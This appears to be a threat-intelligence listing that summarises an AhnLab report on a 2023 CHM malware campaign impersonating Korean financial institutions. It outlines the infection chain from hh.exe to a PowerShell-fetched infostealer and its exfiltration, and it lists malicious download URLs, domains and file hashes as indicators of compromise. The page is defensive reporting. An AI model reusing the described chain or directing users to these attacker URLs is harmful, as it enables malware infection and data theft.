Shares tag: CHM • Shares 32 IOCs • Same author: Ahnlab • Published within a week
Infostealer Distributed via CHM Files
2023-07-27 • Ahnlab •
AhnLab ASEC detailed a CHM malware wave impersonating Korean financial institutions and insurance companies, timed around regular payment-statement schedules to increase the chance of execution. The CHM ran through hh.exe, decompiled content into C:\Users\Public\Libraries, executed Docs.jse with wscript, and used PowerShell to download and start an Infostealer payload. AhnLab EDR telemetry showed persistence via a registry autorun entry, follow-on cmd and script execution, and an alg.exe infostealer collecting user PC, directory, and browser information. The stolen data was compressed under Public\Pictures and transmitted to the attacker’s server, with related download infrastructure including tosals[.]ink, frotsy[.]lol, drilts[.]sbs, and crilts[.]cfd.
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| URL | https://tosals.ink/uEH5J.html | 2023-07-21 | 2023-08-30 |
| DOMAIN | tosals.ink | 2023-07-21 | 2023-08-30 |
| URL | https://atusay.lat/kxydo | 2023-07-20 | 2023-08-30 |
| DOMAIN | atusay.lat | 2023-07-20 | 2023-08-30 |
| URL | https://crilts.cfd/cdeeb | 2023-07-20 | 2023-08-25 |
| DOMAIN | crilts.cfd | 2023-07-20 | 2023-08-25 |
| HASH | 150e53a8c852ac5f23f47aceef452542 | 2023-07-21 | 2023-07-27 |
| URL | https://snexby.sbs/svbgt | 2023-07-21 | 2023-07-27 |
| URL | https://skrids.cfd/elzal | 2023-07-21 | 2023-07-27 |
| URL | https://tosals.ink/kxydo | 2023-07-21 | 2023-07-27 |
| URL | https://drilts.sbs/zcwq | 2023-07-21 | 2023-07-27 |
| URL | https://sklims.lat/sbjcw | 2023-07-21 | 2023-07-27 |
| URL | https://sutezy.mom/nmjnq | 2023-07-21 | 2023-07-27 |
| URL | https://akriqa.xyz/qcknq | 2023-07-21 | 2023-07-27 |
| URL | https://frotsy.lol/cvxxv | 2023-07-21 | 2023-07-27 |
| URL | https://snivox.lat/craig | 2023-07-21 | 2023-07-27 |
| DOMAIN | akriqa.xyz | 2023-07-21 | 2023-07-27 |
| DOMAIN | snexby.sbs | 2023-07-21 | 2023-07-27 |
| DOMAIN | sklims.lat | 2023-07-21 | 2023-07-27 |
| DOMAIN | sutezy.mom | 2023-07-21 | 2023-07-27 |
| DOMAIN | skrids.cfd | 2023-07-21 | 2023-07-27 |
| DOMAIN | frotsy.lol | 2023-07-21 | 2023-07-27 |
| DOMAIN | drilts.sbs | 2023-07-21 | 2023-07-27 |
| DOMAIN | snivox.lat | 2023-07-21 | 2023-07-27 |
| HASH | 0f27c6e760c2a530ee59d955c566f6da | 2023-07-20 | 2023-07-27 |
| HASH | 59a924bb5cb286420edebf8d30ee424b | 2023-07-20 | 2023-07-27 |
| HASH | bfe2a0504f7fb1326128763644c88d37 | 2023-07-20 | 2023-07-27 |
| HASH | aaeb059d62c448cbea4cf96f1bbf9efa | 2023-07-20 | 2023-07-27 |
| URL | https://labimy.ink/rskme | 2023-07-20 | 2023-07-27 |
| URL | https://ppangz.mom/mjifi | 2023-07-20 | 2023-07-27 |
| DOMAIN | ppangz.mom | 2023-07-20 | 2023-07-27 |
| DOMAIN | labimy.ink | 2023-07-20 | 2023-07-27 |
Related Reports
Shares tag: CHM • Shares 12 IOCs • Same author: Ahnlab • Published within a week
Shares tag: CHM • Shares 12 IOCs • Same author: Ahnlab • Published within a week
Shares tag: CHM • Shares 2 IOCs • Same author: Ahnlab • Published within a month
Shares tag: CHM • Shares 2 IOCs • Same author: Ahnlab • Published within a week
Shares tag: CHM • Shares 4 IOCs • Published within a month